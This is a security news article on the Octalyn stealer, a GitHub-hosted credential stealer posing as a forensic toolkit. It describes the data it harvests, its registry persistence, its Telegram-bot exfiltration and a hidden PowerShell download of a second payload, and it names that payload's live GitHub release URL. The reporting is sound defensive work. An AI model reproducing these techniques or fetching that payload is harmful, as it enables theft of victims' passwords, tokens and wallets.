Octalyn Stealer Harvests VPN Configs, Passwords, and Cookies in Organized Folder Structure

The Octalyn Forensic Toolkit, which is openly accessible on GitHub, has been revealed as a powerful credential stealer that poses as a research tool for red teaming and digital forensics. This is a worrying development for cybersecurity.

Developed with a C++-based payload module and a Delphi-built graphical user interface (GUI) builder, the toolkit lowers the barrier for threat actors by simplifying payload generation.

Users need only input a Telegram bot token and chat ID to create fully functional binaries capable of real-time data exfiltration.

Despite claims of educational intent, static analysis reveals its core functionality targets sensitive data, including browser passwords, cookies, and autofill information from platforms like Google Chrome, Microsoft Edge, and Opera.

Modular Design Enables Easy Credential Theft

The stealer also extracts Discord and Telegram tokens, VPN configurations, gaming account details, and cryptocurrency wallet artifacts such as addresses, private keys, seed phrases, wallet.dat files, and browser extension data for assets like Bitcoin, Ethereum, Litecoin, and Monero.

Executed stealthily, the payload establishes persistence via Windows Startup folder entries and registry modifications under HKCUSoftwareMicrosoftWindowsCurrentVersionRun, ensuring automatic relaunch on system boot.

High entropy scores above 7 in components like Build.exe indicate heavy obfuscation with junk data to thwart reverse engineering, while embedded resources drop additional executables TelegramBuild.exe, rvn.exe, and assembly.exe into the %TEMP% directory using APIs like GetTempPathA and ShellExecuteA in silent mode.

Dynamic analysis further uncovers Octalyn’s sophisticated exfiltration mechanism, where stolen data is organized into structured folders within %TEMP%ctalyn, including subdirectories for Crypto wallets, VPN, Browsers, Discord, Games, and Socials.

Files such as All_browsers_cookies.txt, autofill.txt, bookmarks.txt, discord.txt, history.txt, and passwords.txt compile harvested credentials for easy attacker parsing, facilitating session hijacking, profiling, or further exploitation.

Secondary Payload Risks Amplify Threat

Post-collection, a PowerShell script compresses the data into a ZIP archive named with the victim’s username suffixed as OctalynRetrieved.zip, which is transmitted over TLS-secured connections to api.telegram.org for bot-controlled exfiltration.

According to Cyfirma Report, this encrypted channel evades network inspection and enables command reception from the attacker’s Telegram infrastructure.

Adding to the peril, a Base64-encoded PowerShell command (in UTF-16LE format) executed hidden via SW_HIDE attempts to download a secondary payload, winlogon.exe, from a GitHub URL (https://github.com/git-user691/psycho/releases/download/v1/rundll32.exe).

Although the file was unavailable during analysis, the live repository suggests potential for future malicious deliveries.

The toolkit’s Winsock-based networking, modular design, and lightweight build make it highly evasive and accessible, mapping to MITRE ATT&CK techniques like credential access (T1555), persistence (T1547.001), and exfiltration over C2 (T1041).

Last updated three months ago, Octalyn’s focus on financial assets and secondary downloader hints at deliberate malicious engineering, despite the developer’s forensic narrative.

Metadata from repository files even exposed the author’s PC username, underscoring operational security lapses.

Security teams are urged to monitor for indicators like unusual %TEMP% activity, registry changes, and Telegram API traffic to mitigate risks from this abuse-prone tool.

Indicators of Compromise

Stay Updated on Daily Cybersecurity News. Follow us on Google News, LinkedIn, and X.